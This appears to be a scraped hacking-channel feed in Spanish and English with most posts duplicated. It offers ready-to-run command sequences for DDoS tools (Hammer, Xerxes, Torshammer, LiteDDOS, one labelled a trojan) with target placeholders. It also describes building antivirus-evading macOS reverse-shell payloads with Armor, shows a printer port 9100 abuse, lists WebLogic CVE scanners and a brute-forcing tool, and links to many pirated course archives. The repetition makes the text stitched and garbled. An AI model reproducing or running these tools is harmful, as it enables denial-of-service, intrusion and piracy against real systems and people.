Adios Rockyou.txt - Bienvenido Kaonashi.txt - https://t.co/DYG8Op5RiG
Noticias de seguridad informática
Cómo explotar las vulnerabilidades de una impresora para usarla como un servidor FTP anónimo
Muchas personas aún lo ignoran, pero es posible acceder a la información de dispositivos periféricos (principalmente escáneres e impresoras) a través de Internet. Suena muy mal, y puede ponerse aún peor, pues no siquiera se requieren conocimientos avanzados de hacking y seguridad informática para explotar este acceso vía puertos.
Los principales objetivos de
estos ataques son los dispositivos HP, presentes en millones de entornos
domésticos, empresariales y gubernamentales. Para cualquier usuario que sepa
dónde buscar, es increíblemente fácil encontrar algún software de código
abierto para cargar e interactuar con los discos duros de una impresora HP
mediante el puerto 9100. En la mayoría de los casos, los hackers sólo deben
cargar un archivo a la impresora y posteriormente ingresar http://<printer_ip_address/hp/device/<file_name
desde cualquier navegador web para acceder.
Este es un serio problema de
seguridad informática, pues al explotar este puerto se pueden desplegar muchas
otras actividades maliciosas, como la inyección de scripts maliciosos en la
impresora, lo que podría funcionar como etapa inicial de ataque. Además, las
impresoras pueden emplearse como repositorios para alojar contenido malicioso,
incluso ilícito, fuera del alcance de cualquier usuario legítimo o agencia de
la ley.
Hay dos principales razones por
las que los hackers recurren a esta clase de dispositivos. En primer lugar, es
necesario recordar que las impresoras se mantienen encendidas y en línea de
forma casi permanente, por lo que siguen alojando contenido incluso en estado
de suspensión o modo de ahorro de energía.
La segunda razón es el descuido o
poco interés de los administradores de estos equipos, pues son realmente
escasas las ocasiones en las que se detienen a revisar qué contenido está
alojado en las unidades de almacenamiento en las impresoras, sin olvidar que
nadie se toma el tiempo de habilitar el inicio de sesión para acceder a estos
dispositivos.
Aunque la divulgación pública de
las vulnerabilidades para las que no existen correcciones es una práctica
arriesgada, la comunidad de expertos en seguridad informática considera que
esta es una medida completamente válida para que todos los usuarios sean
consientes de los riesgos a los que están expuestos debido a estos dispositivos,
lo que al final podría resultar en la adopción de una postura proactiva de
frente a las amenazas de ciberseguridad.
En el caso particular de las
impresoras HP, los usuarios también podrían verificar que su dispositivo tenga
el puerto 9100 inhabilitado, lo que previene el acceso remoto.
El cargo Cómo explotar las vulnerabilidades de una impresora para usarla como un servidor FTP anónimo apareció primero en Noticias de seguridad informática.
Cómo explotar las vulnerabilidades de una impresora para usarla como un servidor FTP anónimo
Muchas personas aún lo ignoran, pero es posible acceder a la información de dispositivos periféricos (principalmente escáneres e impresoras) a través de Internet. Suena muy mal, y puede ponerse aún peor, pues no siquiera se requieren conocimientos avanzados de hacking y seguridad informática para explotar este acceso vía puertos.
Los principales objetivos de
estos ataques son los dispositivos HP, presentes en millones de entornos
domésticos, empresariales y gubernamentales. Para cualquier usuario que sepa
dónde buscar, es increíblemente fácil encontrar algún software de código
abierto para cargar e interactuar con los discos duros de una impresora HP
mediante el puerto 9100. En la mayoría de los casos, los hackers sólo deben
cargar un archivo a la impresora y posteriormente ingresar http://<printer_ip_address/hp/device/<file_name
desde cualquier navegador web para acceder.
Este es un serio problema de
seguridad informática, pues al explotar este puerto se pueden desplegar muchas
otras actividades maliciosas, como la inyección de scripts maliciosos en la
impresora, lo que podría funcionar como etapa inicial de ataque. Además, las
impresoras pueden emplearse como repositorios para alojar contenido malicioso,
incluso ilícito, fuera del alcance de cualquier usuario legítimo o agencia de
la ley.
Hay dos principales razones por
las que los hackers recurren a esta clase de dispositivos. En primer lugar, es
necesario recordar que las impresoras se mantienen encendidas y en línea de
forma casi permanente, por lo que siguen alojando contenido incluso en estado
de suspensión o modo de ahorro de energía.
La segunda razón es el descuido o
poco interés de los administradores de estos equipos, pues son realmente
escasas las ocasiones en las que se detienen a revisar qué contenido está
alojado en las unidades de almacenamiento en las impresoras, sin olvidar que
nadie se toma el tiempo de habilitar el inicio de sesión para acceder a estos
dispositivos.
Aunque la divulgación pública de
las vulnerabilidades para las que no existen correcciones es una práctica
arriesgada, la comunidad de expertos en seguridad informática considera que
esta es una medida completamente válida para que todos los usuarios sean
consientes de los riesgos a los que están expuestos debido a estos dispositivos,
lo que al final podría resultar en la adopción de una postura proactiva de
frente a las amenazas de ciberseguridad.
En el caso particular de las
impresoras HP, los usuarios también podrían verificar que su dispositivo tenga
el puerto 9100 inhabilitado, lo que previene el acceso remoto.
El cargo Cómo explotar las vulnerabilidades de una impresora para usarla como un servidor FTP anónimo apareció primero en Noticias de seguridad informática.
weblogicScanner 漏洞扫描工具
CVE-2014-4210
CVE-2016-0638
CVE-2016-3510
CVE-2017-3248
CVE-2017-3506
CVE-2017-10271
CVE-2018-2628
CVE-2018-2893
CVE-2018-2894
CVE-2018-3191
CVE-2018-3245
CVE-2018-3252
CVE-2019-2618
CVE-2019-2725
CVE-2019-2729
CVE-2019-2890https://t.co/phKZBaMFih pic.twitter.com/ChD5exV1wi— Jin Wook Kim February 18, 2020
CVE-2014-4210
CVE-2016-0638
CVE-2016-3510
CVE-2017-3248
CVE-2017-3506
CVE-2017-10271
CVE-2018-2628
CVE-2018-2893
CVE-2018-2894
CVE-2018-3191
CVE-2018-3245
CVE-2018-3252
CVE-2019-2618
CVE-2019-2725
CVE-2019-2729
CVE-2019-2890https://t.co/phKZBaMFih pic.twitter.com/ChD5exV1wi— Jin Wook Kim February 18, 2020
🎩 eLearnSecurity – Mobile Application Security and Penetration Testing (MASPT v2) 🎩
Syllabus
Section: Android
Module 1 : Android: Android Architectures
Module 2 : Android: Setting up a Testing Environment
Module 3 : Android: Android Build Process
Module 4 : Android: Reversing APKs
Module 5 : Android: Device Rooting
Module 6 : Android: Android Application Fundamentals
Module 7 : Android: Network Traffic
Module 8 : Android: Device and Data Security
Module 9 : Android: Tapjacking
Module 10 : Android: Static Code Analysis
Module 11 : Android: Dynamic Code Analysis
Section: iOS
Module 1 : iOS: iOS Architecture
Module 2 : iOS: Device Jailbreaking
Module 3 : iOS: Setting up a Testing Environment
Module 4 : iOS: iOS Build Process
Module 5 : iOS: Reversing iOS Apps
Module 6 : iOS: iOS Application Fundamentals
Module 7 : iOS: iOS Testing Fundamentals
Module 8 : iOS: Network Traffic
Module 9 : iOS: Device Administration
Module 10 : iOS: Dynamic Analysis
Download:
https://drive.google.com/drive/folders/1R9D5f38p6C9yUuO52YWrQxUdxEbktaT4
eLearnSecurity Hacking Courses
elearnsecurity courses:
1- Web Application Penetration Testing eXtreme (eWPTX )
6th2- Penetration Testing Professional (ePTPv3)
3- Web Application Penetration Testing (eWAPT v2)
https://mega.nz/#F!fqognSKY!cMa-JNPgLgTikrpI-JqMdQ
Cyber training 365
(many certificates include CHFI, CSAT, CSMD, CEH, CWAD, and more...)
https://mega.nz/?fbclid=IwAR3nWcT-uky4-zKGJ2jNRt_McQ7QXo-cBOF0GFlZJxuQLJjT6J4iH3obIvs#F!HGg2TCTA!CjyPNP3bktKV9w4_g2xUDg!aegwkYKS
50gb of hacking courses :
https://mega.nz/#F!7jIyBShb!5uQgMY-3UjZNCMrISP6ufQ
Pentester Academy 1
https://mega.nz/#F!BfBRECpZ!rwUAqCMPahV6e9oSs8twwQ
Pentester Academy 2
https://mega.nz/#F!7OIE2C5D!QMfFjVo6ipO1K7X_FhdOHg
Reverse engineering and Exploitation development
https://drive.google.com/file/d/0B5a4h0JxHNetNGtTRzBXT1Q4SlU/view
Offensive Security - Advanced Web Attacks and Exploitation [AWAE]
https://mega.nz/#F!pVYhhYbb!-zJK__ZypSgnnxoLFy2ICw
#Udemy - Practical #Ethical #Hacking - The Complete Course :-
#Download :- https://mega.nz/?fbclid=IwAR1f1T6jOdfQ01APTxTieVq2fCnckyH-FE6VTbOBEwzk9Op1fRHpAXrEt7M#F!n3RWzKYY!1xvBdLgoVxsNayNoxl7qQA
#Packt - #CompTIA #Security+ (SYO-501) course ...
#Download link :-
https://mega.nz/#F!DnZWBCYb!vAjXcKf90Pn3w5y4iPrdxg
#CompTIA #A+ full course:-
https://youtu.be/2eLe7uz-7CM
#CompTIA #Network+ full course:-
https://youtu.be/vrh0epPAC5wE6VTbOBEwzk9Op1fRHpAXrEt7M#F
Syllabus
Section: Android
Module 1 : Android: Android Architectures
Module 2 : Android: Setting up a Testing Environment
Module 3 : Android: Android Build Process
Module 4 : Android: Reversing APKs
Module 5 : Android: Device Rooting
Module 6 : Android: Android Application Fundamentals
Module 7 : Android: Network Traffic
Module 8 : Android: Device and Data Security
Module 9 : Android: Tapjacking
Module 10 : Android: Static Code Analysis
Module 11 : Android: Dynamic Code Analysis
Section: iOS
Module 1 : iOS: iOS Architecture
Module 2 : iOS: Device Jailbreaking
Module 3 : iOS: Setting up a Testing Environment
Module 4 : iOS: iOS Build Process
Module 5 : iOS: Reversing iOS Apps
Module 6 : iOS: iOS Application Fundamentals
Module 7 : iOS: iOS Testing Fundamentals
Module 8 : iOS: Network Traffic
Module 9 : iOS: Device Administration
Module 10 : iOS: Dynamic Analysis
Download:
https://drive.google.com/drive/folders/1R9D5f38p6C9yUuO52YWrQxUdxEbktaT4
eLearnSecurity Hacking Courses
elearnsecurity courses:
1- Web Application Penetration Testing eXtreme (eWPTX )
6th2- Penetration Testing Professional (ePTPv3)
3- Web Application Penetration Testing (eWAPT v2)
https://mega.nz/#F!fqognSKY!cMa-JNPgLgTikrpI-JqMdQ
Cyber training 365
(many certificates include CHFI, CSAT, CSMD, CEH, CWAD, and more...)
https://mega.nz/?fbclid=IwAR3nWcT-uky4-zKGJ2jNRt_McQ7QXo-cBOF0GFlZJxuQLJjT6J4iH3obIvs#F!HGg2TCTA!CjyPNP3bktKV9w4_g2xUDg!aegwkYKS
50gb of hacking courses :
https://mega.nz/#F!7jIyBShb!5uQgMY-3UjZNCMrISP6ufQ
Pentester Academy 1
https://mega.nz/#F!BfBRECpZ!rwUAqCMPahV6e9oSs8twwQ
Pentester Academy 2
https://mega.nz/#F!7OIE2C5D!QMfFjVo6ipO1K7X_FhdOHg
Reverse engineering and Exploitation development
https://drive.google.com/file/d/0B5a4h0JxHNetNGtTRzBXT1Q4SlU/view
Offensive Security - Advanced Web Attacks and Exploitation [AWAE]
https://mega.nz/#F!pVYhhYbb!-zJK__ZypSgnnxoLFy2ICw
#Udemy - Practical #Ethical #Hacking - The Complete Course :-
#Download :- https://mega.nz/?fbclid=IwAR1f1T6jOdfQ01APTxTieVq2fCnckyH-FE6VTbOBEwzk9Op1fRHpAXrEt7M#F!n3RWzKYY!1xvBdLgoVxsNayNoxl7qQA
#Packt - #CompTIA #Security+ (SYO-501) course ...
#Download link :-
https://mega.nz/#F!DnZWBCYb!vAjXcKf90Pn3w5y4iPrdxg
#CompTIA #A+ full course:-
https://youtu.be/2eLe7uz-7CM
#CompTIA #Network+ full course:-
https://youtu.be/vrh0epPAC5wE6VTbOBEwzk9Op1fRHpAXrEt7M#F
mega.nz
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now
Generate payloads..hosts for any network
apt update && apt upgrade -y
pkg install nmap
pkg install wget
pkg install curl
pkg install git
git clone https://github.com/HackeRStrategy/Irparpaya-a.git
cd Irparpaya-a
chmod +x real-host-v2.sh
bash real-host-v2.sh
apt update && apt upgrade -y
pkg install nmap
pkg install wget
pkg install curl
pkg install git
git clone https://github.com/HackeRStrategy/Irparpaya-a.git
cd Irparpaya-a
chmod +x real-host-v2.sh
bash real-host-v2.sh
GitHub
GitHub - HackeRStrategy/Irparpaya-a: Irparpayaña, Herramienta diseñada para sacar la mayor informacion de páginas web y crear payload…
Irparpayaña, Herramienta diseñada para sacar la mayor informacion de páginas web y crear payload de inyección (sacar metodos de internet ilimitado) - HackeRStrategy/Irparpaya-a
《DDOS ATTACK》
●Lucita DDOS
$ apt update && apt upgrade
$ apt install python
$ apt install git
$ git clone https://github.com/zlucifer/lucita_ddos
$ cd lucita_ddos
$ chmod +x pukul.py
$ python pukul.py
●Ddos Attack (Trojan)
$ apt install git
$ apt install python
$ apt install bash
$ apt install toilet
$ apt install lolcat
$ git clone https://github.com/BPCATTACKER/DOS-TOOKITS
$ cd DOS-TOOKITS
$ chmod +x DOS-TOOKITS.sh
$ sh DoS-TOOKIT.sh
●Hammer
$ pkg update
$ pkg upgrade
$ pkg install python
$ pkg install git
$ git clone https://github.com/cyweb/hammer
$ cd hammer
$ chmod +x hammer.py
$ python hammer.py
$ python3 hammer.py -s [IP target] -p [80] -t [135]
●Xerxes
$ apt install git
$ apt install clang
$ git clone https://github.com/zanyarjamal/xerxes
$ ls
$ cd xerxes
$ ls
$ clang xerxes.c -o xerxes
$ ls
$ ./xerxes (nama website) 80
●Torshammer
$ pkg update
$ pkg install git
$ apt install tor
$ pkg install python2
$ git clone https://github.com/dotfighter/torshammer.git
$ ls
$ cd torshammer
$ chmod +x torshammer.oy
$ python2 torshammer.py
●LiteDDOS
$ apt update
$ apt upgrade
$ pkg install git
$ pkg install python2
$ git clone https://github.com/4L13199/LITEDDOS
$ cd LITEDDOS
$ chmod +x liteDDOS.py
$ python2 liteDDOS.py
●Lucita DDOS
$ apt update && apt upgrade
$ apt install python
$ apt install git
$ git clone https://github.com/zlucifer/lucita_ddos
$ cd lucita_ddos
$ chmod +x pukul.py
$ python pukul.py
●Ddos Attack (Trojan)
$ apt install git
$ apt install python
$ apt install bash
$ apt install toilet
$ apt install lolcat
$ git clone https://github.com/BPCATTACKER/DOS-TOOKITS
$ cd DOS-TOOKITS
$ chmod +x DOS-TOOKITS.sh
$ sh DoS-TOOKIT.sh
●Hammer
$ pkg update
$ pkg upgrade
$ pkg install python
$ pkg install git
$ git clone https://github.com/cyweb/hammer
$ cd hammer
$ chmod +x hammer.py
$ python hammer.py
$ python3 hammer.py -s [IP target] -p [80] -t [135]
●Xerxes
$ apt install git
$ apt install clang
$ git clone https://github.com/zanyarjamal/xerxes
$ ls
$ cd xerxes
$ ls
$ clang xerxes.c -o xerxes
$ ls
$ ./xerxes (nama website) 80
●Torshammer
$ pkg update
$ pkg install git
$ apt install tor
$ pkg install python2
$ git clone https://github.com/dotfighter/torshammer.git
$ ls
$ cd torshammer
$ chmod +x torshammer.oy
$ python2 torshammer.py
●LiteDDOS
$ apt update
$ apt upgrade
$ pkg install git
$ pkg install python2
$ git clone https://github.com/4L13199/LITEDDOS
$ cd LITEDDOS
$ chmod +x liteDDOS.py
$ python2 liteDDOS.py
GitHub
GitHub - zlucifer/lucita_ddos: DDoS Script v1
DDoS Script v1. Contribute to zlucifer/lucita_ddos development by creating an account on GitHub.
Bypass Windows 10 User Group Policy (and more) with this One Weird Trick
https://medium.com/tenable-techblog/bypass-windows-10-user-group-policy-and-more-with-this-one-weird-trick-552d4bc5cc1b
https://medium.com/tenable-techblog/bypass-windows-10-user-group-policy-and-more-with-this-one-weird-trick-552d4bc5cc1b
Medium
Bypass Windows 10 User Group Policy (and more) with this One Weird Trick
I‘m going to share an (ab)use of a Windows feature which can result in bypassing User Group Policy (as well as a few other interesting…
Critical Bluetooth Vulnerability in Android (CVE-2020-0022)
https://insinuator.net/2020/02/critical-bluetooth-vulnerability-in-android-cve-2020-0022/
https://insinuator.net/2020/02/critical-bluetooth-vulnerability-in-android-cve-2020-0022/
TESTED UNDETECTABLE MACOS PAYLOAD:
Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners.
1) Armor relies on LibreSSL to encrypt the input file and create the SSL certificate. If LibreSSL isn't found in your system, Armor will attempt to install it. The function for this can be found in the armor.sh file. Ncat is also a dependency and can be installed in Kali using $ apt-get update && apt-get install nmap.
2) git clone https://github.com/tokyoneon/Armor
3) cd Armor/
4) chmod +x armor.sh
5) ./armor.sh /path/to/payload.txt 1.2.3.4 443
6) The 1.2.3.4 address is the attacker's IP address where the decryption key will be hosted. This can be a local IP address or VPS. The port number (443), is arbitrary and can be changed as needed.
A Netcat listener is started on port 4444. The "payload.txt" file is read and shown to contain a simple Bash one-liner that, when executed, will create a TCP connection between the target MacBook at the attacker's Netcat listener. Armor is used to encrypt the bash one-liner. Ncat is used to host the decryption key on the attacker's server. When the stager is executed in the target MacBook (not shown in the gif), the bash one-liner is decrypted and executed without writing any data to the harddrive. Ncat immediately terminates the listener after the key has been used. When the Netcat connection is established, the attacker has remote access to the target MacBook.
>Admittedly, encrypting most macOS-specific payloads is overkill. This specific bash one-liner is capable of bypassing antivirus without the help of Armor. But this is just an exmaple. The same degree of obfuscation can be applied to sophisticated Python, Ruby, and Shell scripts designed to execute a variety of advanced attacks.
Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners.
1) Armor relies on LibreSSL to encrypt the input file and create the SSL certificate. If LibreSSL isn't found in your system, Armor will attempt to install it. The function for this can be found in the armor.sh file. Ncat is also a dependency and can be installed in Kali using $ apt-get update && apt-get install nmap.
2) git clone https://github.com/tokyoneon/Armor
3) cd Armor/
4) chmod +x armor.sh
5) ./armor.sh /path/to/payload.txt 1.2.3.4 443
6) The 1.2.3.4 address is the attacker's IP address where the decryption key will be hosted. This can be a local IP address or VPS. The port number (443), is arbitrary and can be changed as needed.
A Netcat listener is started on port 4444. The "payload.txt" file is read and shown to contain a simple Bash one-liner that, when executed, will create a TCP connection between the target MacBook at the attacker's Netcat listener. Armor is used to encrypt the bash one-liner. Ncat is used to host the decryption key on the attacker's server. When the stager is executed in the target MacBook (not shown in the gif), the bash one-liner is decrypted and executed without writing any data to the harddrive. Ncat immediately terminates the listener after the key has been used. When the Netcat connection is established, the attacker has remote access to the target MacBook.
>Admittedly, encrypting most macOS-specific payloads is overkill. This specific bash one-liner is capable of bypassing antivirus without the help of Armor. But this is just an exmaple. The same degree of obfuscation can be applied to sophisticated Python, Ruby, and Shell scripts designed to execute a variety of advanced attacks.
GitHub
GitHub - tokyoneon/Armor: Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus…
Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners. - tokyoneon/Armor
Web-Pentesting 2019 script:
>ITWSV is automated penetration testing tool which performs information gathering, auditing and reporting.
𝕀𝕟𝕤𝕥𝕒𝕝𝕝𝕚𝕤𝕒𝕥𝕚𝕠𝕟 & ℝ𝕦𝕟:
1) git clone https://github.com/penetrate2hack/ITWSV.git
2) cd ITWSV
3) chmod +x start.sh
4) chmod +x update.sh (only if required)
5) ./start.sh
>ITWSV is automated penetration testing tool which performs information gathering, auditing and reporting.
𝕀𝕟𝕤𝕥𝕒𝕝𝕝𝕚𝕤𝕒𝕥𝕚𝕠𝕟 & ℝ𝕦𝕟:
1) git clone https://github.com/penetrate2hack/ITWSV.git
2) cd ITWSV
3) chmod +x start.sh
4) chmod +x update.sh (only if required)
5) ./start.sh
GitHub
GitHub - penetrate2hack/ITWSV: ITWSV- Integrated Tool for Web Security Vulnerability
ITWSV- Integrated Tool for Web Security Vulnerability - penetrate2hack/ITWSV
MalwareBytes ha publicado un titular muy jugoso: por primera vez las amenazas en Mac superaron a las de PC en una proporción de nada menos que el doble en 2019. Muchas webs han multiplicado este gran titular.
BRUTEX
BRUTEX is a shell based open source tool to make your work faster. It combines the power of Nmap, Hydra and DNSenum. This tool will automatically run an nmap scan to your target and then it will brute force all the open services for you, such as FTP, SSH and more using Hydra.
Installing Brutex
Same old story, clone the repository first.
git clone https://github.com/1N3/BruteX.git
Run the install script, to download all the missing dependencies.
cd BruteX/ ./install.sh
BRUTEX is a shell based open source tool to make your work faster. It combines the power of Nmap, Hydra and DNSenum. This tool will automatically run an nmap scan to your target and then it will brute force all the open services for you, such as FTP, SSH and more using Hydra.
Installing Brutex
Same old story, clone the repository first.
git clone https://github.com/1N3/BruteX.git
Run the install script, to download all the missing dependencies.
cd BruteX/ ./install.sh
GitHub
GitHub - 1N3/BruteX: Automatically brute force all services running on a target.
Automatically brute force all services running on a target. - 1N3/BruteX
Big Database
https://mega.nz/#F!MQlxyQLa!giOZO3KuIeqOOiFEL3-yXQ
Linux Academy - Big Data Essentials
https://mega.nz/#!5MFFXKCQ!0VksweGpw442NyXX7TSb1eUm4SM_uCSCvsirm_Z9uSg
50GB+ Udemy Courses
https://mega.nz/#F!63BynCoI!kbOpwEWr9lNUiZ14DOWjxQ
Paid Hack Pack
https://mega.nz/#F!RvJTnSaZ!aXAmZLoF6M8iXtICKSJenw!17QjTIbb
https://mega.nz/#F!MQlxyQLa!giOZO3KuIeqOOiFEL3-yXQ
Linux Academy - Big Data Essentials
https://mega.nz/#!5MFFXKCQ!0VksweGpw442NyXX7TSb1eUm4SM_uCSCvsirm_Z9uSg
50GB+ Udemy Courses
https://mega.nz/#F!63BynCoI!kbOpwEWr9lNUiZ14DOWjxQ
Paid Hack Pack
https://mega.nz/#F!RvJTnSaZ!aXAmZLoF6M8iXtICKSJenw!17QjTIbb
mega.nz
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now
Todos con enlaces directos:
1: Administración de sistemas operativos
https://mega.nz/#F!26Y3hA4D!86JS5eszvWE6F34DX4lQxw
2: Administración de sistemas operativos
https://mega.nz/#F!uyYT0KJK!2mvfFsKqH7IDKmlpFYtqAA
3: Ampliación de computadores
https://mega.nz/#F!jvRxEarK!cZi26Xhrca3FdQB2kna0tA
4: Análisis Forense
https://mega.nz/#F!HjRXgAjL!ADw4t9QsMeErdmHNdM_CJw
5: AnalisisForense
https://mega.nz/#F!H3QlXagI!gJW6iPlFHvjNC2nanj9mPA
6: Anatomía ataque informático
https://mega.nz/#F!K6Bh1aqY!dOca1Xe9zRoCoLp4FjRv4Q
7: Android
https://mega.nz/#F!SnJxFA7K!gKhDBseT5EuT5-xZsvUYjA
8: Anon99
https://mega.nz/#F!urBTTIpR!URlCCGnOzHvmfikTZWyVog
9: Arduino
https://mega.nz/#F!PzBjiAQS!2R9zkN_iQtRx8azCkaNlKQ
10: Arquitectura informática
https://mega.nz/#F!CzR2HArB!R1VoTMM5OWMfxS3ozjUfHg
11: ASP
https://mega.nz/#F!fqQyxQhT!02ZZ2PVTAGwxQQu2o8f4xQ
12 : Redes
https://mega.nz/#F!u6REGazT!17bPkKJqb3L3MhCpXY2aig
13: Software Libre
https://mega.nz/#F!yvYEDYBK!lXVVEDE0_-tiCn5I2JKshA
14: Auditorias wed
https://mega.nz/#F!6iQWBaCQ!zOKv5-iNp69FBcvDQHkGcw
15: Auditorías Wed By aletinte
https://mega.nz/#F!u2AEVaZR!A2wNpnFq9uq9Grc6DIGXDQ
16: Blackdoor
https://mega.nz/#F!CuQg0ILY!yeOtzs0HTv2tVOAwkIs46g
17: BlackTack
https://mega.nz/#F!CnYA0ILQ!ujOMrkCW1x0ntQwnbU3JKw
18: BlackTack5
https://mega.nz/#F!O6Z0Ta6I!nCJHEOvQVOshAg2vf09AKg
19: BlackTack 5 By Aletinte
https://mega.nz/#F!izBWEa5S!7jVUoqUA2XzSUZao6wrjjg
20: Base de Datos
https://mega.nz/#F!TnZWxaya!1InqYf71LoRgoWTNZ6XG0A
21: Base de datos By Aletinte
https://mega.nz/#F!W6YimQhT!M67uLY2hNJ79TFfvBI-bZw
22: BaseDeDatos
https://mega.nz/#F!CmAUgKjR!b1kGktBxNJ5HJ_2JaGVGSw
23: Binarios
https://mega.nz/#F!HvAGRKpb!jVP7ZaViuMz-2d9uKNjbiA
24: Programacion C
https://mega.nz/#F!TzJ0DKib!VGxqzlF4Ew1EB_hUWjW8rA
25: CGI
https://mega.nz/#F!37QQCaDR!RHPjNDyLAFCcA8M-qd7V3A
26: Cifrado-Vpn
https://mega.nz/#F!3yQSVQRZ!FOYsjn_B_61AiPIK_KENfw
28: Circuitos
https://mega.nz/#F!OzJ2wQpa!UUwR5BLY7YPCDqy26sJafA
29: CMD
https://mega.nz/#F!6mIGGYaJ!guYD9u6JS6r7znWSm-AA0g
30: COBOL
https://mega.nz/#F!D2ISGADI!BgCKKqKlSPJPGRSdOQe_3Q
31: Comandos
https://mega.nz/#F!ajJAyKab!zYsaSWbCesMnKbiMq415eQ
32: Bluetooth
https://mega.nz/#F!arJCWI7A!WXWrDwPg9dgPb_JxVEAm0Q
33: Cracking
https://mega.nz/#F!WiAARCjD!lQ-TfZ_gmqZOgQiB6KTErg
34: Cracking by Aletinte
https://mega.nz/#F!XvJCCaZZ!QKPnq6IVyoTCQlsLMkG96w
35: Criptografía
https://mega.nz/#F!TzBAXKYL!aYqu54lnq3nC9BLr_v-vFg
36: Criptograf
https://mega.nz/#F!SjRi0ALB!Pb3IMC-A8_4JFYSJgeX7MA
37: Cursos
https://mega.nz/#F!P2wVBSpK!ein9iW50EeYzS-VprX8ugA
38: Deep Wed
https://mega.nz/#F!mrohiChS!Xj2ddirab5KI97DdHJoKWw
39: Deface
https://mega.nz/#F!D64TkQBB!T9Dz2fXtT_NLyCZjvrz9Yg
40: Deidel-Deidel
https://mega.nz/#F!T6gzzKBB!oZrJJv4hofsCAMzjoroNMg
41: DELPHI
https://mega.nz/#F!Hj5RSKqK!LvSCDl53lOMMVWRcIi_kEA
42: Desarrollo de software
https://mega.nz/#F!qr5XEARS!U8_kb_BGQh6CDGVK_JkG4g
43: Desarrollo de software By Aletinte
https://mega.nz/#F!iupHwYbC!On4nK0CRsNUxcdR429gBVA
44: Detecsion-coliciones
https://mega.nz/#F!LzwHVQ4S!t8us76oqb6JrC5ccp33mRg
45: Deteccion-honeynets
https://mega.nz/#F!fvwnyAyS!QX9CjhA7SPg4FNnD8mxPnQ
46: Dinero electrónico
https://mega.nz/#F!j2pzkaAD!I7fIzUujuDkq37h1Z9tgQQ
47: Diseño-Desarrollo honeypost
https://mega.nz/#F!angBEAwJ!7nxfB97uRSLJKj4P7CPD-Q
48: Electrónica
https://mega.nz/#F!zu5zlSxC!apjvUelJmt31YT-ReUhf7A
49: Ensamblador
https://mega.nz/#F!Om432CYJ!shvMiqhwxlXdH9kKyl6ohQ
50: Estudió
https://mega.nz/#F!P6gXxQhb!ipRwbOn5w03VllvqQtQXpA
51: Extras
https://mega.nz/#F!fmwzWYqJ!vgdXvph26vEYSbhqY73Xjw
52: Firewall
https://mega.nz/#F!6ugziSxR!QgtGwfZcbEwGnru0iYpOVA
53: Forense
https://mega.nz/#F!26oDASgK!NnKTJbaGEFcJ_B5AgcVWpA
54: Forense By Aletinte
https://mega.nz/#F!m7hF0YTZ!05HyuFw_7cDd9BzloamoHg
55: Fortran
https://mega.nz/#F!62gBnIoD!n5raX4xfGf_VmfSC9M_EZA
56: FORTRAN
https://mega.nz/#F!PixXxKjQ!B6TQ6lZchXwWSsgU_BHKUA
57: General
https://mega.nz/#F!yqo1wagQ!Ebr93EwmTLQxUsvl_xCm8g
57: General
https://mega.nz/#F!yqo1wagQ!Ebr93EwmTLQxUsvl_xCm8g
1: Administración de sistemas operativos
https://mega.nz/#F!26Y3hA4D!86JS5eszvWE6F34DX4lQxw
2: Administración de sistemas operativos
https://mega.nz/#F!uyYT0KJK!2mvfFsKqH7IDKmlpFYtqAA
3: Ampliación de computadores
https://mega.nz/#F!jvRxEarK!cZi26Xhrca3FdQB2kna0tA
4: Análisis Forense
https://mega.nz/#F!HjRXgAjL!ADw4t9QsMeErdmHNdM_CJw
5: AnalisisForense
https://mega.nz/#F!H3QlXagI!gJW6iPlFHvjNC2nanj9mPA
6: Anatomía ataque informático
https://mega.nz/#F!K6Bh1aqY!dOca1Xe9zRoCoLp4FjRv4Q
7: Android
https://mega.nz/#F!SnJxFA7K!gKhDBseT5EuT5-xZsvUYjA
8: Anon99
https://mega.nz/#F!urBTTIpR!URlCCGnOzHvmfikTZWyVog
9: Arduino
https://mega.nz/#F!PzBjiAQS!2R9zkN_iQtRx8azCkaNlKQ
10: Arquitectura informática
https://mega.nz/#F!CzR2HArB!R1VoTMM5OWMfxS3ozjUfHg
11: ASP
https://mega.nz/#F!fqQyxQhT!02ZZ2PVTAGwxQQu2o8f4xQ
12 : Redes
https://mega.nz/#F!u6REGazT!17bPkKJqb3L3MhCpXY2aig
13: Software Libre
https://mega.nz/#F!yvYEDYBK!lXVVEDE0_-tiCn5I2JKshA
14: Auditorias wed
https://mega.nz/#F!6iQWBaCQ!zOKv5-iNp69FBcvDQHkGcw
15: Auditorías Wed By aletinte
https://mega.nz/#F!u2AEVaZR!A2wNpnFq9uq9Grc6DIGXDQ
16: Blackdoor
https://mega.nz/#F!CuQg0ILY!yeOtzs0HTv2tVOAwkIs46g
17: BlackTack
https://mega.nz/#F!CnYA0ILQ!ujOMrkCW1x0ntQwnbU3JKw
18: BlackTack5
https://mega.nz/#F!O6Z0Ta6I!nCJHEOvQVOshAg2vf09AKg
19: BlackTack 5 By Aletinte
https://mega.nz/#F!izBWEa5S!7jVUoqUA2XzSUZao6wrjjg
20: Base de Datos
https://mega.nz/#F!TnZWxaya!1InqYf71LoRgoWTNZ6XG0A
21: Base de datos By Aletinte
https://mega.nz/#F!W6YimQhT!M67uLY2hNJ79TFfvBI-bZw
22: BaseDeDatos
https://mega.nz/#F!CmAUgKjR!b1kGktBxNJ5HJ_2JaGVGSw
23: Binarios
https://mega.nz/#F!HvAGRKpb!jVP7ZaViuMz-2d9uKNjbiA
24: Programacion C
https://mega.nz/#F!TzJ0DKib!VGxqzlF4Ew1EB_hUWjW8rA
25: CGI
https://mega.nz/#F!37QQCaDR!RHPjNDyLAFCcA8M-qd7V3A
26: Cifrado-Vpn
https://mega.nz/#F!3yQSVQRZ!FOYsjn_B_61AiPIK_KENfw
28: Circuitos
https://mega.nz/#F!OzJ2wQpa!UUwR5BLY7YPCDqy26sJafA
29: CMD
https://mega.nz/#F!6mIGGYaJ!guYD9u6JS6r7znWSm-AA0g
30: COBOL
https://mega.nz/#F!D2ISGADI!BgCKKqKlSPJPGRSdOQe_3Q
31: Comandos
https://mega.nz/#F!ajJAyKab!zYsaSWbCesMnKbiMq415eQ
32: Bluetooth
https://mega.nz/#F!arJCWI7A!WXWrDwPg9dgPb_JxVEAm0Q
33: Cracking
